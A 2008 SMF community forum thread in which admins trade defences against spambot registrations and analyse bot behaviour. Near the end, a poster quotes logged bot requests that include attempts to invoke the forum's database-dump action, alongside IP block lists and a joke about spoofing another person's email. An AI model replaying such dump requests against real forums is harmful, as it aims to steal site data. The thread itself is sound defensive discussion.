I'm a bit late on seeing this, but the bots seem to have stopped joining up after an install of the reCAPTCHA mod, and also enabling the age requirement (it's at 13, if you'd care to know).

Thanks to SlammedDime for pointing me here, and Deprecated for the info. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: thehilltowns on November 17, 2008, 05:34:31 AM
QuoteDon't forget that 2.0 now adds registration questions. These should work just as well (and no mod install needed!).

Good point.  I have been using "Board Registration Password v1.0" with much success, though mine is only a very small local forum but with a growing base.  I disabled it for a span of time as I was trying some new things (and switched to an iMac so was focused on that), and got pounded with spammers (though all registrations are directed to me first so no damage done).  As soon as I re-enabled this, no more spam.  Works at least up to 1.1.7.

Best regards,

Matt
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: IngeJones on November 17, 2008, 05:45:50 AM
One suggestion I have been reading in this thread is to upgrade to version 2.x  But it still says on the download not to use in "production" forums as it is still unstable.   I wouldn't like to swap problems with spam for problems with other unstable features.

Unless of course the development team feel it is now safe to lift that caveat?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ephralon on November 17, 2008, 06:07:17 AM
Quote from: Motoko-chan on November 14, 2008, 11:53:34 AM
SMF doesn't allow HTML in posts (unless you've disabled that security), so the only way that code could be inserted is through a security hole.

ephralon, look at Visual Verification Options (http://custom.simplemachines.org/mods/index.php?mod=734) or Advanced Visual Verification (http://custom.simplemachines.org/mods/index.php?mod=907).

Thank you very much for this link, I don't know why I missed them when searching for a solution. I installed the first one and watched for 2 days. Dozens of bots tried to post but failed, I'm a happy spam free penguin for the moment.

Still, to recap:
Version is 1.1.7, HTML is disabled, guest posting is disabled, only installed mod is a small mood mod with no input options.
Bots fail to register.
Bots fail to post in locked poll threads.
Bots fail to post in regular topics.
Bots manage to post in open poll threads as guests.
Installing the Visual Verification Options took care of that, but are you sure there's not a small vulnerability somewhere?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: kat on November 17, 2008, 07:06:03 AM
Good thoughts, Deprecated.

I think it's odd that people don't look to see if there's a thread relevant to their needs, before posting.

Especially when this thread's right on page one.

Maybe they should be ignored, rather than redirected. ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Ashdaw on November 17, 2008, 07:10:25 AM
Thanks for clearing this up. I didn't think it was the fault of any update by SMF. I get a few idiots here and there and usually able to get rid of them without THOSE ones coming back. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Estoyderodriguez on November 17, 2008, 07:42:52 AM
Just want to say "thanks" for everyone's advice!
We made it so people had to be authorised by us - and it's working well (thank heavens our forum is not too busy though eh)
E
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: fwitt on November 17, 2008, 10:19:53 AM
Quote from: Deprecated on November 16, 2008, 08:49:23 PM
Quote from: jackregan on November 15, 2008, 05:44:59 PM
I am running a forum on 1.1.7 and over the last week or so I have noticed a massive massive increase in spambots.

My solution was to add a field to the registration form using the custom profile fields mod. The field requires input and simply asks 'what day of the week is it?'

The point being that I'll know straight away if the 'user' is human or not. (I have 'member approval' as the registration method.)

But, funnily enough, since I've made this change, I've had no spambots whatsoever. Maybe they can't handle fields that require forced input, other than username, E-mail, Password.

Hope that helps.

Requesting other replies on this same suggestion. I haven't tried it but I believe it merits consideration.

Pending replies on if this works I'm giving consideration to adding this mod to the OP. None of my own forums are being spammed so I cannot tell for myself if this will work.

I have two custom fields on one forum and three on another all required fields the bots are still registering by repeating the username in all txt fields. In the dropdown box they are keeping with the null -please select- option which until this point I hadn't realized I made selectable (no user has even clicked it).

So at this point it looks as though I could stop them atm by checking for this behaviour in the registration process.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: SlammedDime on November 17, 2008, 10:24:32 AM
Here's what they are doing (after analyzing my logs and collecting data)

They retrieve the form and parse out all of the input fields and they retrieve the verification image.  They then fill in all of the fields based on what they're asking for, and analyze the image to get the verification code, then the submit the form with all of the information.  They are not submitting anything extra, POST wise, that would allow them to bypass the image... they are getting the image correct

This is probably a perl script that runs and does this, as all of the above happens literally in 2-3 seconds, from the time they first retrieve the form, until the time they submit it.  It would appear they are actually deciphering the image, not using human intervention.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 17, 2008, 11:30:11 AM
Another dumb question ...

Given that the bots are registering via the methods described, how are they activating the registrations? Are they using a valid email address and following up the registration by "clicking the link" in the email?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: naitram on November 17, 2008, 11:31:29 AM
blaming 1.1.7 wont get you anywhere. i was hit weeks ago on 1.1.6 as was posted in here its a cat and mouse game.

people are writing software that automates the process of registering and posting. its no different then what a human does.

if you feel its a bug that a bot got in then its a bug that allows humans to post as well.

do some research on what you got bit by. i'm not going to post it here to give them free publicity, but i will say i was shocked when i watched the 10 minute flash demo of this stuff. they do brag that they can defeat captcha.

i also found multiple forum types with the same spam when i did my googling

it's unfortunate that managing/maintaining our forums can be a full time job. but i'm sure glad to know that the SMF guys are at my back for stuff like this. they dont need people pointing fingers at them for no good reason
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 17, 2008, 11:32:23 AM
Would not take much for a human to sit at a pc, and click the links in the emails.
That would be a piece of cake for someone to do.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 17, 2008, 11:33:51 AM
Quote from: rvforumite on November 17, 2008, 11:30:11 AM
Given that the bots are registering via the methods described, how are they activating the registrations? Are they using a valid email address and following up the registration by "clicking the link" in the email?

Yes. A lot of the new generation of spamming software will also create an e-mail account at a free provider for that contingency. It's some sophisticated stuff. One wonders what kind of cool things would be developed if the authors focused on better endeavors.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: IngeJones on November 17, 2008, 11:34:45 AM
Quote from: BurkeKnight on November 17, 2008, 11:32:23 AM
Would not take much for a human to sit at a pc, and click the links in the emails.
That would be a piece of cake for someone to do.

Quite.  I am not convinced that all this is done purely by bots.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 17, 2008, 11:37:45 AM
Quote from: rvforumite on November 17, 2008, 11:30:11 AMGiven that the bots are registering via the methods described, how are they activating the registrations? Are they using a valid email address and following up the registration by "clicking the link" in the email?

Only part of the script is concerned with registering accounts on forums. There is another part of the script that registers mass quantities of email addresses with free email providers. Yet another part of the script visits those email addresses, retrieves the validation emails and clicks the links.

The scripts go through all the identical steps that a human would do, getting an email account, registering at a forum, validating the registration, then making posts. The good thing is that if we screw up just one little part of all that the bots are too stupid to adjust, so the botmasters have to tweak the script to make it handle the new part we threw in. That's why our defensive measures work.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 17, 2008, 11:48:28 AM
Thanks Motoko-chan and Deprecated. As you say, clever stuff.

QuoteOne wonders what kind of cool things would be developed if the authors focused on better endeavors.

Yes, like when the AV companies used to hire virus writers to help create the AV stuff. Much more productive use of their energy and efforts.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: IngeJones on November 17, 2008, 11:59:10 AM
Quote from: rvforumite on November 17, 2008, 11:48:28 AM
Yes, like when the AV companies used to hire virus writers to help create the AV stuff. Much more productive use of their energy and efforts.

Can they be trusted?  Wouldn't they just design in some back doors?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 17, 2008, 12:24:54 PM
Quote from: IngeJones on November 17, 2008, 11:59:10 AMCan they be trusted?  Wouldn't they just design in some back doors?

I don't think MC or I were suggesting that the spammers be hired. MC was merely suggesting that, if their efforts were directed into positive creations, we'd all be amazed at what could be done. I was merely drawing an an analogy to the virus kiddies, but my data point for that is quite a few years old.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 17, 2008, 12:26:41 PM
Best of both worlds.

They make money making the viruses, then they make more working for the AV companies to stop their own creations.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: fwitt on November 17, 2008, 12:30:15 PM
the virus companies stopped that when it was starting to be seen as a way to get a job, write a virus good enough to get yourself noticed and land a job in the industry. It got them some bad publicity so they stopped.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: swtdivalove on November 17, 2008, 12:39:45 PM
Since I own my webserver, I have literally thousands that are blacklisted at my firewall.  Really cuts down on spam.

I had IPB 1.3 at one point, kept getting nailed until I put in a required field that asked this question: What is eleven + 1 equal, and then I stopped getting spam on my site.

Bots can't do math, as of yet, and if they are able to decypher the captcha, one more step would be to ask a question and get a required response that takes human input to answer.  This has really worked for me and I plan on employing such a measure.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: chunkylover on November 17, 2008, 12:52:44 PM
sadly, since upgrading to 1.1.7, i can no longer use the package manager.

so far, since upgrading captcha to highest setting and adding age restriction, the spam has stopped.

any idea about the package manager problem? i've actually done the upgrade, to 1.1.7., delete all files but settings and settings bak, then freshen all files from full install as suggested here
http://www.simplemachines.org/community/index.php?topic=274204.msg1797128#msg1797128 (http://www.simplemachines.org/community/index.php?topic=274204.msg1797128#msg1797128)

i've also checked persmissions noted here:
http://docs.simplemachines.org/index.php?topic=5.msg5#msg5 (http://docs.simplemachines.org/index.php?topic=5.msg5#msg5)


Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: IngeJones on November 17, 2008, 01:20:10 PM
Quote from: swtdivalove on November 17, 2008, 12:39:45 PM

I had IPB 1.3 at one point, kept getting nailed until I put in a required field that asked this question: What is eleven + 1 equal, and then I stopped getting spam on my site.

If I put something like that on my site, I would have *no* registrations.  My users can't read a notice or question, let alone manage the math.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: swtdivalove on November 17, 2008, 02:05:33 PM
Quote from: IngeJones on November 17, 2008, 01:20:10 PM
Quote from: swtdivalove on November 17, 2008, 12:39:45 PM

I had IPB 1.3 at one point, kept getting nailed until I put in a required field that asked this question: What is eleven + 1 equal, and then I stopped getting spam on my site.

If I put something like that on my site, I would have *no* registrations.  My users can't read a notice or question, let alone manage the math.

IngeJones, sorry... But your comment just made me fall out of my chair with laughter. LOL  I mean no disrespect. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: johnnymax on November 17, 2008, 03:32:53 PM
I was hammered the first day. I took the time to ban all the I.P.'s and I installed "Are You Human"
On my error logs it am still getting over 10 pages a day that are telling guests that their I.P. has been banned. ;D
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: wiggy on November 17, 2008, 10:13:55 PM
I banned the user accounts that were posting the spam....now i have a few thousand error log entries where by they are trying to login again....i have added their scummy ip address's to my .htaccess file to ban them as well but it does not seem to be having any effect....
any one got any idea how i can stop it?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: swtdivalove on November 17, 2008, 10:15:24 PM
You can contact your host and have them ban them?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: wiggy on November 17, 2008, 10:18:01 PM
ok,
will try that thanks!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 17, 2008, 10:18:59 PM
Quote from: swtdivalove on November 17, 2008, 10:15:24 PM
You can contact your host and have them ban them?

Not anything that most hosts would bother with.

Please post your .htaccess file contents. I don't see why that wouldn't work, and perhaps there is an error in your Apache syntax.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: lax.slash on November 17, 2008, 10:20:53 PM
Hmm... I'm curious about something. I haven't been hit yet. But I run Tiny Portal. Has anyone running TP, or any other portal/CMS bridge for that matter been hit? With or without the SMF registration system?  ???
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: fwitt on November 18, 2008, 06:37:57 AM
Quote from: lax.slash on November 17, 2008, 10:20:53 PM
Hmm... I'm curious about something. I haven't been hit yet. But I run Tiny Portal. Has anyone running TP, or any other portal/CMS bridge for that matter been hit? With or without the SMF registration system?  ???

yes three of the four sites I admin on that have been hit run tinyportal.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dvk01 on November 18, 2008, 08:16:21 AM
Tiny portal or any mod or add on makes no difference to the likelihood of attack

the bots scan looking for SMF and try to sign up

various mods make it more difficult for them to sign up but the only almost guaranteed way is for admin approval for all registrations but that needs you to examine every registration and make an educated guess whether it is a bot or a legitimate new member and that can be extremely difficult  to work out unless you have a local forum covering a very local geographical area & you are happy to automatically reject prospective members from outside that area


Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: SlammedDime on November 18, 2008, 08:18:40 AM
I'm running Mambo bridged with SMF... they hit my contact form before registering, and leave once they submit the contact, so I just get a bunch of junk mail.... :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 18, 2008, 08:39:32 AM
Quote from: dvk01 on November 18, 2008, 08:16:21 AM
the bots scan looking for SMF and try to sign up

Point of order...

The bots scan for ANY type of forum.

I've been dealing with 2 VB forums under attack, and been dealing with complaints by people about the following stats on web host forums I am part of:

Forum type - Number under attack:
SMF: 20
VB: 15
phpBB: 30
ProBoards: over 50 last I checked.
Others: more than I can remember.

Therefore, I do not fully believe that the bots are scanning just for any particular type of forum, but ALL forums in general.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: offrocker on November 18, 2008, 09:23:56 AM
I was the only registered member on my forum, (under construction) also just upgraded to 117, even though that may not be the problem. I deleted on spammer the other day, and now have another suspected one that hasn't posted yet. Can someone please tell me how to apply post approval, so that I get to see their posts and approve them before they are added to the board?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: wiggy on November 18, 2008, 10:20:39 AM
my htaccess file

order allow,deny
deny from 66.199.231.218
deny from 202.47.224.211
deny from 66.112.177.179
deny from fatjackhosting.com
allow from all

Have now banned the ip's using ip deny manager within cpanel...
Hopefully someone will pick up on the above ip's and give them some of the crap back that they like dishing out  :-X
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ITA003 on November 18, 2008, 12:31:58 PM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
What can you do?
I'm thinking make a mod to check, in the register page, with www.stopforumspam.com (http://www.stopforumspam.com/) which have a simple API to get the spam IP/Email.
Waht's do you think? Is a good idea?

I'm looking the mod in the first message, but are logical check and I think that is "simple" to develop somthing to bypass that control...


PS. Sorry for my English... :(
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: SlammedDime on November 18, 2008, 12:38:23 PM
Quote from: ITA003 on November 18, 2008, 12:31:58 PM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
What can you do?
I'm thinking make a mod to check, in the register page, with www.stopforumspam.com (http://www.stopforumspam.com/) which have a simple API to get the spam IP/Email.
Waht's do you think? Is a good idea?

I'm looking the mod in the first message, but are logical check and I think that is "simple" to develop somthing to bypass that control...


PS. Sorry for my English... :(
That's not a bad idea at all.  Have it check and send the user an email if they are blocked and deny their registration.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ITA003 on November 18, 2008, 12:40:28 PM
Quote from: SlammedDime on November 18, 2008, 12:38:23 PM
That's not a bad idea at all.  Have it check and send the user an email if they are blocked and deny their registration.
I prefer to show a message in the registration window to contact the forum administrator... or something else
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: SlammedDime on November 18, 2008, 12:41:38 PM
Or options to do either or both :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 18, 2008, 12:41:45 PM
Quote from: ITA003 on November 18, 2008, 12:31:58 PMI'm thinking make a mod to check, in the register page, with www.stopforumspam.com which have a simple API to get the spam IP/Email.
Waht's do you think? Is a good idea?

I'm looking the mod in the first message, but are logical check and I think that is "simple" to develop somthing to bypass that control...

Sure, it's a good idea. Please write it yourself, or you can post your request in our Mod Requests (http://www.simplemachines.org/community/index.php?board=79.0) board and maybe somebody will be encouraged to write the mod package.

I hope to be working on a different type of modification later today if time permits. Speaking for myself only, I'm not all that interested in using outside resources. My mod will stand on its own, inside SMF.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: SlammedDime on November 18, 2008, 12:44:51 PM
It would even be possible to implement the mod on the registration page, so before they even attempt to register, check their IP, and instead of displaying the registration form, display an email form that emails themself spam... lol
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 18, 2008, 12:49:09 PM
Matt, I really like that!!! Instead of spamming your forum or spamming your contact page, they end up spamming themselves! Very poetic! :D :D :D

Just use a sender address that doesn't receive reply emails. Or, if you were the vindictive sort, a bad 'Netizen, and had somebody you dislike, use their email address!!! (Just kidding!)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: fwitt on November 18, 2008, 01:21:04 PM
why not just send it as if it had come from there email, or whatever the last spam email addy was ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 18, 2008, 01:58:01 PM
My concern with StopForumSpam is that it's user-contributed with what looks to be little to no oversight; all that is needed is an API key. This means that honest people signing up can be blacklisted by the service all too easily.

Given what I've seen people consider as spam (much of it newsletters they signed up for and don't want anymore - easily unsubscribed), I don't have much confidence in unvetted submissions.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: offrocker on November 18, 2008, 03:32:05 PM
Quote from: offrocker on November 18, 2008, 09:23:56 AMCan someone please tell me how to apply post approval, so that I get to see their posts and approve them before they are added to the board?
:(
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 18, 2008, 04:18:49 PM
Offrocker, maybe you weren't responded to because that is more a thing meant for its own support topic? I will say that approval is default in 2.0, but not in 1.1.7. There might be a mod for the 1.1 series, but I haven't looked. Why not look and maybe make a post on your own topic?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ITA003 on November 18, 2008, 06:47:55 PM
I write myself (this evening) the mod... tomorrow I complete the package...
I check the spam address (Email and/or IP) in the registration page (after submit the info), at the moment not email sent from the mod... maybe in a future version, but only a message to user (and in a Log Message).
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: TheDisturbedOne on November 18, 2008, 07:36:19 PM
Quote from: Motoko-chan on November 18, 2008, 01:58:01 PM
My concern with StopForumSpam is that it's user-contributed with what looks to be little to no oversight; all that is needed is an API key. This means that honest people signing up can be blacklisted by the service all too easily.
And the IPs change.  I once received a blacklisted IP.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: pcpro on November 19, 2008, 01:41:46 AM
I installer "are you human"
Where can I administrate it then ?
Because now nobody can register, I get an error when trying.
And I see nothing about  "are you human" eater.....
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: sacred on November 19, 2008, 07:04:17 AM
I'm an admin on several boards and have had SUCH problems with these spambots the past week.. I upped the complexitity of the verification image and put an age limit and that seems to have stopped them for now. Thanks :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: CHwebby on November 19, 2008, 09:35:25 AM
Like all of you, I recently have been having spam bot attacks. Only 2 of the spammers included links to websites in their profile and signature. Both for drug sites. No posts were made in the forum. The others that keep joining I just get rid of pronto. I noticed some of these bogus members coming back a day later to try and log in according to my logs. So I'm guessing it's signing up them trying to come in a day later to spam.

Anyhoo, I just set verification to the High setting and installed the Human mod. I'll report back to let you know how that worked.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: CHwebby on November 19, 2008, 09:38:47 AM
Looks like I have a bot on right now. Waiting to see what happens.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: CHwebby on November 19, 2008, 09:48:55 AM
It seemed to work! w00t w00t
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: bigmo66 on November 19, 2008, 01:27:31 PM
Oh how they persist! They keep trying, but since my high Captcha and age verification not one has been able to even register! Here is a shot of the Ban Triggers. Well over 1000 tries in just a few days.

93.174.93.196     spammers1     170     
93.174.93.196    spammers2    268    
94.102.60.115    spammers3    268    
94.102.60.115    spammers4    240    
94.102.60.115    spammers5    270
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Inuya5ha on November 19, 2008, 10:51:15 PM
Quote from: wiggy on November 18, 2008, 10:20:39 AM
my htaccess file

order allow,deny
deny from 66.199.231.218
deny from 202.47.224.211
deny from 66.112.177.179
deny from fatjackhosting.com
allow from all

Banning by IP is as useless as a bald man in a shampoo ad. Those spambots come from tons of free, anonymous proxies, which appear and disappear faster than you can imagine. Your banned IP list will become totally obsolete in a few hours while the spambots change to newly discovered proxies with new IP addresses.

Dynamic addresses are in my opinion the worst error in the IP architecture, that way anyone can get online anonymously for malicious purposes. And I bet IPV6 will make things easier for spammers, one way or another.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 19, 2008, 10:57:36 PM
I was going to make a similar comment until I realized that bigmo66 merely meant to show how many hits were coming from the same IP addresses. He didn't mean that anybody should ban those IP addresses, because that would just be playing the Whack-a-Mole game. He was just showing how fiercely he was being attacked. :)

It occurs to me that many may not realize what Whack-a-Mole is, particularly those of other than American culture. You just gotta love Wikipedia, and here's the link! Whack-a-Mole (http://en.wikipedia.org/wiki/Whack_a_mole)

By the way, a little bird told me that new relief is on the way for those of you suffering from spambot attacks, in the form of a new mod package that adds SMF 2.0's verification questions to SMF 1.1.7. :) Seems that my favorite mod author wrote it (me). We'll have it up on the Mod Site as soon as it passes vetting by the Custom Team. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: RicochetPeter on November 20, 2008, 03:22:59 AM
Sorry for double posting, but I want to add that I have slight notion that either
a) SMF's captcha code night be broken (in 1.1.7) or
b) SMF might be vulnerable to some sort of code injection, that prevents proper creation of captcha's

See this post (http://www.simplemachines.org/community/index.php?topic=273839)

Correct me if I'm wrong.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: maxklr on November 20, 2008, 03:34:04 AM
The reCaptcha took care of things for me! Easy to manage!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Wildcat4494 on November 20, 2008, 06:24:34 AM
I usually put Admin approval on for about 30-40 mins when a spam bot is on the forum.

in that time I have time to ban the spammer, report it to spam forums and then I put my forum back to normal.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: CHwebby on November 20, 2008, 07:52:19 AM
Status Update:  After setting my Visual Verification to high and adding the "Are You Human"  mod I have had no new spam bots join up so it must be working. I was getting about 5 - 8 spam bots joining a day.

And it defiantly is NOT anything to do with the 1.1.7 version because I was getting spam-botted and I was behind on updating still running on 1.1.4   
(http://dingo.care2.com/c2c/emoticons/shame.gif)

Hope you all are finding solutions but I HIGHLY recommend the suggestions that Deprecated laid out in the first post of this thread.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: bigmo66 on November 20, 2008, 01:36:58 PM
Quote from: Deprecated on November 19, 2008, 10:57:36 PM
I was going to make a similar comment until I realized that bigmo66 merely meant to show how many hits were coming from the same IP addresses. He didn't mean that anybody should ban those IP addresses, because that would just be playing the Whack-a-Mole game. He was just showing how fiercely he was being attacked. :)

It occurs to me that many may not realize what Whack-a-Mole is, particularly those of other than American culture. You just gotta love Wikipedia, and here's the link! Whack-a-Mole (http://en.wikipedia.org/wiki/Whack_a_mole)

By the way, a little bird told me that new relief is on the way for those of you suffering from spambot attacks, in the form of a new mod package that adds SMF 2.0's verification questions to SMF 1.1.7. :) Seems that my favorite mod author wrote it (me). We'll have it up on the Mod Site as soon as it passes vetting by the Custom Team. :)

Yep, just showing how many attempts in just a day or so.  I am well aware of "whack a mole"!  I have seen a couple dozen IPs so far, but the ones I posted are relentless!  Are they going to give up after a time?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 20, 2008, 03:33:29 PM
Doesn't matter how often they knock at your front door. Just don't answer the door bell. :)

Really, they can't hurt you if they can't get in. There's no need to concern yourself about it.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on November 21, 2008, 12:07:45 AM
I decided to play the Whack-a-Mole game. I like hitting things with a big hammer :)
I did a whois search on every suspicious registered account, and found this below pattern. Hopefully this info will help others defend themselves.

most, but not all, are gmail registered accounts
most, but not all, are from russian and ukrainian servers
a few attacks from Africa, Asia, and eastern Europe
all spam accounts have a high level password (random numbers/letters)
the user names can be phonetically pronounced, but don't make sense
the time between registration and email verification is significant, like a day
often times many accounts are registered under the exact same IP
the spammer fills in an ICQ number and country location
but that country location does not match the IP location
about 60 attempted registrations per day
most registered accounts have 0 posts, with a very few having 1 post

I banned entire server IP ranges when those servers were located in Ukraine or Russia. Blocking individual IP's would be a huge waste of time. Below are the ranges, followed by the repeated blocked attempts count in the last 11 hours. As you can see, the spammers control a huge range of IPs! I suspect there are many more.

194.165.42.*       9
87.118.124.*       0
78.110.175.*       0
92.241.168.*       0
89.232.64-127.*    0
213.148.168-188.*    0
89.178.*.*       2
94.102.48-63.*    5
91.76-78.0-127.*    4
87.118.96-127.*    3
83.237.160-255.*    0
87.248.176-191.*    1
89.149.195.*       0
79.143.177.*        0
83.237.160-255.*    0
78.157.128-159.*    0
89.248.162.128-255    0
212.95.54.*       0
84.19.176-191.*    1
92.112.192-255.*    0
193.109.248-249.*   0

Search your member list for the first two sections of each IP address I listed, and I promise you you'll find dozens of spam accounts in your forum. These accounts are already approved in your forum, just waiting to spam you in the future. Get them now!

Quotenew relief is on the way for those of you suffering from spambot attacks, in the form of a new mod package that adds SMF 2.0's verification questions to SMF 1.1.7
thanks! please make this a priority!


Oh, and I just made the following changes to my forum:
changed required age to 6
raised SMF Captcha to highest (it was on medium before)
added reCaptcha

Since the change two hours ago, no new spam accounts have been registered.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on November 21, 2008, 03:34:53 AM
I use this link to verify spammers: http://www.stopforumspam.com/search?q=
So far the link has told me the "truth", so I guess the site is reliable.

Just remember that if an IP ain't found there, it doesn't mean that it's not a bot.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on November 21, 2008, 04:22:16 AM
An update to my last post, while looking through new error logs . . . I found this below. I am guessing this is the automated bot URL, no?

QuoteGuest
Today at 12:28:29 PM

IP address 194.165.42.27

URL http://www.myaddress.com/robotforum/index.php?topic=2633.0 [PLM=0][R] GET http://www.myaddress.com/robotforum/index.php?action=register [0,18671,24946] -&gt; [R] POST http://www.myaddress.com/robotforum/index.php?action=register2 [0,0,17446] -&gt; [L] GET http://www.myaddress.com/robotforum/index.php?action=login [0,7050,19026] -&gt; [L] POST http://www.myaddress.com/robotforum/index.php?action=login2 [0,0,19310] -&gt; [N] GET http://www.myaddress.com/robotforum/index.php?topic=2633.0 [0,133803,142083] -&gt; [N] POST http://www.myaddress.com/robotforum/index.php?action=quickmod2;topic=2633.0 [R=302][0,0,337] -&gt; [N] GET http://www.myaddress.com/robotforum/index.php?topic=2633.0 [0,0,142191] -&gt; [N] GET http://www.myaddress.com/robotforum/index.php [5785,0,27832]

Sorry Guest, you are banned from using this forum!


So far none of the spam bots have gotten past my IP filter, so I still haven't verified the registration changes as working. The IP filter appears to be a good short term fix until Deprecated makes the more permanent fix.


Also interesting, and not sure if its related or not to the spam problem, but there appears to also be a bot that tries to download my database every three days (per IP address). But it appears to be failing (see info below). I've since blocked those IP's, but have no idea how to stop these attempts otherwise. Anyone else noticed this?

QuoteGuest
IP addresses:
65.55.209.32
69.24.179.77
72.30.142.163
72.30.142.218
65.55.230.188

example links:

http://www.myaddress.com/robotforum/index.php?struct=on&amp;data=on&amp;compress=gzip&amp;action=dumpdb&amp;sesc=d6ae617142697ea7f007b89300f388

http://www.myaddress.com/robotforum/index.php?struct=on&amp;data=on&amp;compress=gzip&amp;action=dumpdb&amp;edited_for_security_reasons

error: Only administrators can make database backups!


hope this helps someone!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on November 21, 2008, 05:06:06 AM
It really doesn't help to make a list as there are thousends and thousends of IP's and spammer names. This would be a long topic then.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Schoolbusforum on November 21, 2008, 04:39:56 PM
I shut down my site until news comes that the SPAM has stopped
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on November 21, 2008, 04:49:51 PM
So you are waiting for an atomic war? Or to the day there are no more evil people?

That's giving up, dude. Fight back!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Kjell H. on November 21, 2008, 05:16:17 PM
Not sure if it is a coincident!

It stopped 3 days ago when I simply changed settings to:
Member Activation
Medium Password Strength
High complexity on image verfication

Had about 20-30 spam regs per day before the change.

Using 1.1.7
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: SlammedDime on November 21, 2008, 05:32:12 PM
